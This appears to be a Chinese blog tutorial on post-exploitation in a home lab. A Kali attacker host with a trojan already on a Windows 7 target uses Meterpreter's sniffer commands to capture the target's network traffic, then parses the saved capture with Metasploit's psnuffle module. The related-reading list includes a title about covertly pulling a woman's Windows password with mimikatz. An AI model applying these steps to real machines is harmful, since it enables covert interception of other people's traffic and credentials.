偶尔适度的放纵一下,是为了继续道貌岸然的生活,太急了会没有故事,太缓了会没有人生 。。。。
---- 网易云热评
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木马及监听主机参考上篇文章:
二、捕获数据包
【内网渗透 -- 捕获内网数据包】1、加载sniffer:load sniffer
2、查看网卡信息:sniffer_interfaces
文章插图
3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2
4、进入小受,然后随便访问几个网站
文章插图
文章插图
4、将捕获到数据保存下来,默认保存地址/root
sniffer_dump 2 aiyou.cap
文章插图
5、启动wireshark,打开保存下来的文件
文章插图
文章插图
三、通过解包模块解包
1、选择解包模块
use auxiliary/sniffer/psnuffle
2、查看需要设置的参数
show options
文章插图
3、设置解包文件路径
set pcapfile /root/2.cap
4、运行,run,可以查看到我们刚才访问的地址
文章插图
推荐阅读
- 一次渗透测试引发的Json格式下CSRF攻击的探索
- 让外地出差员工访问到内网资源的实现方
- 内网渗透之ICMP隐藏隧道
- 从上传漏洞到任意文件读取
- 菜鸡的渗透日记
- 对另外网段的渗透测试
- 内网渗透神器:使用mimikatz悄悄提取妹子Win7密码
- 道教对茶道的渗透,敬和清寂的日本茶道
- 利用CentOS7云主机搭建NPS内网穿透代理服务器
- typhoon靶机渗透